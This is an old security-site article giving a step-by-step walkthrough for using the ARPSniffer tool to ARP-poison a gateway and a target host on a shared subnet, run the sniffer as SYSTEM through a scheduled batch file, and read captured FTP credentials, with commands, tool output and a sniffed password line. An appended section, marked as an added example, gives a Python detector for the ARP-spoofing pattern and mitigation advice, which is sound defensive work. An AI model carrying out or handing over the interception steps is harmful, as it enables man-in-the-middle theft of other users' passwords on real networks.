Gaining the highest privileges with ARPSniffer - vulnerability alert - Black Bar Security Net

2005-12-03T00:00:00
ID MYHACK58:6220055050
Type myhack58
Reporter Anonymous
Modified 2005-12-03T00:00:00

Description

Suppose the target host's IP is 61.139.1.79. On the same subnet we have a host with limited privileges, IP 61.139.1.88, which we can log into over port 3389.

The first step: tracert 61.139.1.1

C:\WIN2000\system32>tracert 61.139.1.1

Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops:

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

Trace complete.

This shows that the target host and your host are on the same network segment, so ARPSNIFFER can be used.

The second step: check the IP settings and the network cards.

C:\WIN2000\system32>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73

This shows there is only one network card, so when running ARPSNIFFER you can omit the fifth parameter. The Little Banyan Tree homepage mentioned above may not say this; after testing I realized that if you have only one card and pass 0 as the fifth parameter, it can only sniff the data passing through. From the output above we also know that the gateway is 61.139.1.65.

Step three: check the local time.

C:\WIN2000\system32>net time \\127.0.0.1

\\127.0.0.1 current time is 2003/1/28 PM 09:13

The command completed successfully

Note that the time here is shown in 12-hour format; the at command expects 24-hour format.

Fourth step: write a batch file that starts ARPsniffer.

C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat

Note: we do not pass the fifth parameter here. If there is more than one network card, you must first run arpsniffer directly; it then displays the following:

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter (this adapter index is what you pass as the fifth parameter)

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

The fifth step: run it in the background to start sniffing.

C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat

Note: the time here must be given in 24-hour format. It is best to copy arpsniffer into the system32 directory; the log file is generated there as well. After the fourth step, install the WINPCAP 2.1 driver. Also use the latest version of arpsniffer, 0.5; older versions have some bugs and require changing the registry and rebooting the machine.

The sixth step: read the captured data. The generated log file cannot be viewed or copied directly, so we first have to terminate the ARPSniffer process, which was started with SYSTEM privileges:

C:\winnt\system32>pulist
...................
conime.exe 248 NT AUTHORITY\SYSTEM
explorer.exe 1864 SMSCOMPUTER\Administrator
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ---- this is it!
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM
......................

Kill it:

C:\winnt\system32>pskill 2322

PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com

Process 2322 killed.

C:\winnt\system32>type 1.txt

In my example the sniffed traffic contains an FTP password :)

...............
61.188.218.179(1404)->61.139.1.79(21) PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404) 530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404) 530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21) QUIT
61.188.218.179(1404)->61.139.1.79(21) QUIT
61.139.1.79(21)->61.188.218.179(1404) 221
61.139.1.79(21)->61.188.218.179(1404) 221
............
............

Pay particular attention to the PASS line :)

----------------------------------------------------
Appendix: what is displayed when the tool is run normally in the foreground

C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com

Network Adapter 0: Intel(R) 8255x Based Network Connection

Enable IP Router.... OK

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

Sometimes "can not open driver(0)" is shown first at this point; ignore it and just wait.

Begin Sniffer.........
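The two "Spoof" lines above are exactly the pattern a network defender can look for: after poisoning, both the gateway (61.139.1.65) and the target (61.139.1.79) resolve to the MAC of the attacking host (61.139.1.88). The following detector is an added example, not part of the original article or of ARPSniffer; the observed ARP replies are constructed from the hardware addresses printed above, and the timestamps are assumed.

```python
"""Detect the ARP-cache poisoning pattern shown in the ARPSniffer output.

Constructed defender-side example; the ARP replies below are made up from the
hardware addresses printed by the tool and are not real captures."""
from collections import defaultdict

# Legitimate IP -> MAC bindings, as printed by the "Get ... Hardware Address" lines.
BASELINE = {
    "61.139.1.65": "00-00-0c-07-ac-02",  # gateway
    "61.139.1.79": "00-b0-d0-22-10-cb",  # target host
    "61.139.1.88": "00-b0-d0-22-10-c6",  # host running ARPSniffer
}

# Constructed ARP replies as a sensor on the segment might record them:
# (timestamp, sender IP, sender MAC). The last two correspond to the "Spoof" lines.
OBSERVED = [
    ("20:44:01", "61.139.1.65", "00-00-0c-07-ac-02"),
    ("20:44:01", "61.139.1.79", "00-b0-d0-22-10-cb"),
    ("20:44:02", "61.139.1.88", "00-b0-d0-22-10-c6"),
    ("20:44:05", "61.139.1.65", "00-b0-d0-22-10-c6"),  # gateway now "at" .88's MAC
    ("20:44:05", "61.139.1.79", "00-b0-d0-22-10-c6"),  # target now "at" .88's MAC
]


def detect_arp_spoof(observed, baseline):
    """Return a list of alert strings for two indicators:

    1. an IP is announced with a MAC that differs from the known-good baseline;
    2. one MAC is claimed by more than one IP, the classic man-in-the-middle
       signature where gateway and victim both resolve to the attacker's card."""
    alerts = []
    ips_by_mac = defaultdict(set)
    for ts, ip, mac in observed:
        mac = mac.lower()
        good = baseline.get(ip)
        if good is not None and mac != good.lower():
            # Name the host that legitimately owns the MAC now being claimed.
            owner = next((k for k, v in baseline.items() if v.lower() == mac), "unknown")
            alerts.append(f"{ts} {ip} claimed by {mac} "
                          f"(baseline {good}, MAC belongs to {owner})")
        ips_by_mac[mac].add(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(OBSERVED, BASELINE):
        print(line)
```

The same two checks work on a periodic dump of a host's ARP cache (arp -a) diffed against a static baseline; a static ARP entry for the gateway on exposed hosts removes the poisoning vector entirely.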